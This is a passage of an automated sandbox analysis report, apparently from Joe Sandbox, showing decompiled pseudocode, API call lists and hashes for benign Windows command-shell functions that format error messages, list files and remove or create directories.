                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ObjectSingleWait
                                    • String ID: wil
                                    • API String ID: 24740636-1589926490
                                    • Opcode ID: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction ID: 449603242a98b89dcc6024e88fb28d9ddfc6f3ae99c9e356955644bf3ea0ab5c
                                    • Opcode Fuzzy Hash: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction Fuzzy Hash: 14319538705215ABFB298A69AC88BBB3669EF81354F20413DFB01D7285D774CD428757
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E011F7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x11fd0b4; // 0x2833377e
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E011E6B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E011DBED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E011DB6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E011E0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E011E6FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}





















                                    0x011f7c83
                                    0x011f7c83
                                    0x011f7c8b
                                    0x011f7c92
                                    0x011f7c96
                                    0x011f7c9d
                                    0x011f7ca5
                                    0x011f7cb9
                                    0x011f7cbf
                                    0x011f7cc4
                                    0x011f7d3e
                                    0x011f7d48
                                    0x011f7d4d
                                    0x011f7d59
                                    0x011f7d5d
                                    0x011f7d5d
                                    0x011f7d65
                                    0x011f7d6b
                                    0x011f7cc6
                                    0x011f7ccf
                                    0x011f7ce0
                                    0x011f7cef
                                    0x011f7cf9
                                    0x011f7d09
                                    0x011f7d0c
                                    0x011f7d11
                                    0x011f7d13
                                    0x011f7d13
                                    0x011f7d18
                                    0x011f7d31
                                    0x011f7d39
                                    0x00000000
                                    0x011f7d3b
                                    0x011f7d3b
                                    0x011f7d3b
                                    0x011f7d39
                                    0x011f7d7c

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 011F7CB9
                                    • _ultoa.MSVCRT ref: 011F7CCF
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011F7CD8
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,011FA21D,000000FF,?,00000020), ref: 011F7CF9
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 011F7D31
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 011F7D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                    • String ID: (#$Application$System
                                    • API String ID: 3377411628-593978566
                                    • Opcode ID: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction ID: 6dcdd1b9fc6f390178417ddb2751552c779f80dbc392e63d76c9a12e2a66fd9c
                                    • Opcode Fuzzy Hash: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction Fuzzy Hash: 1D318D71A00208ABDF25DFA5DC08DEE7BB9FB99714F60422DE911E7180EB309941CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D8885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E011D8885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E011E6FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}


















                                    0x011d888d
                                    0x011d8894
                                    0x011d889c
                                    0x011d88a2
                                    0x011d88b1
                                    0x011f0638
                                    0x00000000
                                    0x011f0649
                                    0x011f0649
                                    0x011d88c8
                                    0x011d88d7
                                    0x011d88d7
                                    0x011f0638
                                    0x011d88b7
                                    0x011d88c0
                                    0x011f0656
                                    0x011f065b
                                    0x011f0662
                                    0x011f066b
                                    0x011f0695
                                    0x011f06a4
                                    0x011f0697
                                    0x011f0697
                                    0x011f0697
                                    0x011f0695
                                    0x011f066b
                                    0x011f065b
                                    0x011d88c6
                                    0x00000000

                                    APIs
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88A8
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88B8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0650
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0662
                                    • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F067E
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F068D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                    • String ID: :$\
                                    • API String ID: 3961617410-1166558509
                                    • Opcode ID: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction ID: 4d899fcd761e5aa527f7c1f72e3e70dc2bcc79a9c61047da9cbfac441b95da2d
                                    • Opcode Fuzzy Hash: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction Fuzzy Hash: C011A331E00114AB9B39EB68B85D57E7BB9EB95764B15022CF917E2148EF708941C2A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E2DD2, Relevance: 15.4, APIs: 10, Instructions: 400COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E011E2DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E011E0C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E011E4E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0x1213cf0 = _t222;
						_t277 = 1;
						if(E011E4800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E011E0D89(1, 0x11d24ac);
							E011E0D89(1, 0x11d24ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E011E0D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E011E0D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E011E4C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E011FA834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E011DB610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E011E5266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E011E65F0,  !( ~(_t248 & 0x00004004)) & E011E6550, E011E64F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0x11fd544;
											if( *0x11fd544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E011DB6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E011DC5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E011DC5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E011E0D89(_t277, 0x11d24ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E011FA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E011E6FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E011DB610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E011FA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E011E4C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E011E0040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
											if( *((intOrPtr*)(_t222 + 8)) < 1) {
												L27:
												_t195 = _v2168;
												__eflags = _t195;
												if(_t195 != 0) {
													E011E0040(_t195);
												}
												_v2168 = _t222;
												_t222 =  *_t222;
												continue;
											}
											_t286 = _t194;
											do {
												E011E0040( *_t286);
												E011E0040( *((intOrPtr*)(_t286 + 4)));
												E011E0040(_t286);
												_t286 =  *((intOrPtr*)(_t286 + 0xc));
												_t201 = _v2160 + 1;
												_v2160 = _t201;
												__eflags = _t201 -  *((intOrPtr*)(_t222 + 8));
											} while (_t201 <=  *((intOrPtr*)(_t222 + 8)));
											_t285 = _v2184;
											_t287 = _v2176;
											goto L27;
										}
									}
									_push(0);
									_push(0x40002713);
									E011DC5A2(0);
									goto L10;
								}
								__eflags = _t181 & 0x00020000;
								if((_t181 & 0x00020000) == 0) {
									_t181 = _t181 | 0x00000002;
									__eflags = _t181;
									 *_t285 = _t181;
								}
								goto L18;
							}
							E011DB6CB(_t287);
							goto L12;
						} else {
							goto L10;
						}
					}
				}
			}

































































                                    0x011e2dd2
                                    0x011e2ddd
                                    0x011e2de4
                                    0x011e2dea
                                    0x011e2def
                                    0x011e2df9
                                    0x011e2dfb
                                    0x011e2e06
                                    0x011e2e0c
                                    0x011e2e0e
                                    0x011e2e13
                                    0x011e2e19
                                    0x011e2e1c
                                    0x011e2e24
                                    0x011e2e30
                                    0x011e2e37
                                    0x011e2e40
                                    0x011e2e48
                                    0x011e2e54
                                    0x011e2e5b
                                    0x011e2e64
                                    0x011e2e6c
                                    0x011e2e78
                                    0x011e2e7f
                                    0x011e2e88
                                    0x011e2eae
                                    0x011e2f72
                                    0x011e2f74
                                    0x00000000
                                    0x011e2efe
                                    0x011e2f18
                                    0x011e2f1d
                                    0x011e2f1f
                                    0x00000000
                                    0x011e2f31
                                    0x011e2f31
                                    0x011e2f37
                                    0x011e2f3b
                                    0x011e2f3d
                                    0x011e2f40
                                    0x011e2f40
                                    0x011e2f44
                                    0x011ed999
                                    0x011ed99c
                                    0x011ed99c
                                    0x011e2f4f
                                    0x011ed9a6
                                    0x011ed9a6
                                    0x011e2f5b
                                    0x011e2f64
                                    0x011e2f70
                                    0x011e2fc3
                                    0x011e2fd5
                                    0x011e2fe1
                                    0x011e2fe6
                                    0x011e2fec
                                    0x011e2fec
                                    0x011e2fee
                                    0x00000000
                                    0x00000000
                                    0x011e2ffd
                                    0x011e3002
                                    0x011e3006
                                    0x011e3008
                                    0x011ed9ad
                                    0x011ed9b4
                                    0x011ed9b6
                                    0x011ed9b9
                                    0x011e301a
                                    0x011e301a
                                    0x011e301c
                                    0x011ed9d1
                                    0x011ed9d4
                                    0x011ed9d6
                                    0x011ed9d8
                                    0x011ed9d8
                                    0x011ed9e5
                                    0x011ed9ea
                                    0x011ed9ed
                                    0x011ed9f0
                                    0x011ed9f0
                                    0x011ed9f3
                                    0x011ed9f6
                                    0x011ed9f6
                                    0x011ed9ff
                                    0x011eda04
                                    0x011eda06
                                    0x011eda08
                                    0x011eda0a
                                    0x011eda0a
                                    0x011eda16
                                    0x011eda18
                                    0x011eda1d
                                    0x011eda23
                                    0x011eda25
                                    0x011eda27
                                    0x011eda27
                                    0x011eda2d
                                    0x011eda30
                                    0x011eda32
                                    0x011eda34
                                    0x011eda34
                                    0x011eda3c
                                    0x011eda44
                                    0x011eda46
                                    0x00000000
                                    0x011eda4c
                                    0x011eda4c
                                    0x011eda53
                                    0x011eda64
                                    0x011eda64
                                    0x011eda69
                                    0x011eda6e
                                    0x011eda70
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011eda76
                                    0x011eda57
                                    0x011eda5c
                                    0x011eda5e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011eda5e
                                    0x011eda46
                                    0x011e3022
                                    0x011e3022
                                    0x011e3028
                                    0x011e302e
                                    0x011e3034
                                    0x011e3037
                                    0x011e303a
                                    0x011e303d
                                    0x011e3043
                                    0x011eda7b
                                    0x011eda7b
                                    0x011e3056
                                    0x011e306c
                                    0x011e306e
                                    0x011e3073
                                    0x011e3078
                                    0x011e307e
                                    0x011e3080
                                    0x011edb67
                                    0x011edb67
                                    0x011edb6e
                                    0x00000000
                                    0x00000000
                                    0x011edb74
                                    0x011edb77
                                    0x011edb88
                                    0x011edb8b
                                    0x00000000
                                    0x00000000
                                    0x011edb93
                                    0x011edb98
                                    0x011edb9a
                                    0x011edb9b
                                    0x011edba0
                                    0x011edba5
                                    0x011edbaf
                                    0x00000000
                                    0x011edbb0
                                    0x011edb7b
                                    0x011edb7c
                                    0x011edb7e
                                    0x00000000
                                    0x011e3086
                                    0x011e3089
                                    0x011e308c
                                    0x011edb61
                                    0x00000000
                                    0x011edb61
                                    0x011e3092
                                    0x011e3095
                                    0x011eda8e
                                    0x011eda93
                                    0x011eda95
                                    0x011eda97
                                    0x011edadd
                                    0x011edadd
                                    0x011edae0
                                    0x011edae2
                                    0x011edae4
                                    0x011edae4
                                    0x011edaea
                                    0x011edaf0
                                    0x011edaf2
                                    0x011edaf4
                                    0x011edaf4
                                    0x011edafc
                                    0x011edb04
                                    0x011edb06
                                    0x00000000
                                    0x011edb0c
                                    0x011edb0c
                                    0x011edb0f
                                    0x011edb38
                                    0x011edb38
                                    0x011edb3e
                                    0x011edb40
                                    0x011edb42
                                    0x011edb42
                                    0x011edb4f
                                    0x011edb54
                                    0x011edb56
                                    0x011e2f75
                                    0x011e2f75
                                    0x011e2f7b
                                    0x011e2f81
                                    0x011e2f8e
                                    0x011e2f9b
                                    0x011e2fa5
                                    0x011e2fc2
                                    0x011edb5c
                                    0x00000000
                                    0x011edb5c
                                    0x011edb56
                                    0x011edb13
                                    0x011edb18
                                    0x011edb1a
                                    0x00000000
                                    0x00000000
                                    0x011edb22
                                    0x011edb2b
                                    0x011edb30
                                    0x011edb32
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011edb32
                                    0x011edb06
                                    0x011eda99
                                    0x011eda9c
                                    0x011eda9e
                                    0x011edaa4
                                    0x011edaa7
                                    0x011edaa7
                                    0x011edaaa
                                    0x011edaad
                                    0x011edaad
                                    0x011edab6
                                    0x011edabe
                                    0x011edac0
                                    0x011edac2
                                    0x011edac4
                                    0x011edac4
                                    0x011edad6
                                    0x011edad6
                                    0x011edad8
                                    0x00000000
                                    0x011edad8
                                    0x011e309b
                                    0x011e309e
                                    0x011e30a3
                                    0x011e30a9
                                    0x011e30af
                                    0x011e30b5
                                    0x011e30b8
                                    0x011e30f5
                                    0x011e30f5
                                    0x011e30fb
                                    0x011e30fd
                                    0x011e311a
                                    0x011e311a
                                    0x011e30ff
                                    0x011e3105
                                    0x00000000
                                    0x011e3105
                                    0x011e30ba
                                    0x011e30bc
                                    0x011e30c1
                                    0x011e30c9
                                    0x011e30d0
                                    0x011e30db
                                    0x011e30dd
                                    0x011e30de
                                    0x011e30e4
                                    0x011e30e4
                                    0x011e30e9
                                    0x011e30ef
                                    0x00000000
                                    0x011e30ef
                                    0x011e3080
                                    0x011ed9bf
                                    0x011ed9c0
                                    0x011ed9c5
                                    0x00000000
                                    0x011ed9cb
                                    0x011e300e
                                    0x011e3013
                                    0x011e3015
                                    0x011e3015
                                    0x011e3018
                                    0x011e3018
                                    0x00000000
                                    0x011e3013
                                    0x011e310e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e2f70
                                    0x011e2f1f

                                    APIs
                                    • memset.MSVCRT ref: 011E2E1C
                                    • memset.MSVCRT ref: 011E2E40
                                    • memset.MSVCRT ref: 011E2E64
                                    • memset.MSVCRT ref: 011E2E88
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F81
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F8E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F9B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2FA5
                                      • Part of subcall function 011E4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$BufferConsoleInfoScreen
                                    • String ID:
                                    • API String ID: 1034426908-0
                                    • Opcode ID: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction ID: 0d9978aa5c54a0c9e1598d9a801b889e23451e6f4f1ce1c119389dcb5bd3e0ea
                                    • Opcode Fuzzy Hash: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction Fuzzy Hash: 8AE19071A00A1A9BDF2DDFA5DC58AAABBF5FF54314F044099E50997240EB34EE80CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DBF30, Relevance: 15.3, APIs: 10, Instructions: 259COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E011DBF30(short* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				WCHAR* _v552;
				short* _v556;
				short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t49;
				long _t59;
				struct _SECURITY_ATTRIBUTES* _t61;
				WCHAR* _t63;
				long _t64;
				WCHAR* _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				signed int _t70;
				signed int _t71;
				short* _t73;
				void* _t74;
				WCHAR* _t76;
				WCHAR* _t80;
				signed int _t81;
				signed int _t82;
				struct _SECURITY_ATTRIBUTES* _t86;
				signed int _t88;
				short* _t89;
				signed int _t97;
				short* _t100;
				WCHAR* _t101;
				WCHAR* _t103;
				WCHAR* _t104;
				struct _SECURITY_ATTRIBUTES* _t105;
				void* _t106;
				signed int _t107;

				_t100 = __edx;
				_t47 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t47 ^ _t107;
				_t104 = _a4;
				_t49 = 0x3a;
				if(_t104[1] != _t49) {
					L2:
					_t105 = 0;
					_v20 = 0x104;
					_v28 = 0;
					_t86 = 1;
					_v24 = 1;
					memset( &_v548, 0, 0x104);
					_t91 =  &_v548;
					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t59 = 8;
						L39:
						_push(_t105);
						_push(_t59);
						L40:
						E011DC5A2(_t91);
						L8:
						_t105 = _t86;
						L9:
						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E011E6FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E011DC5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
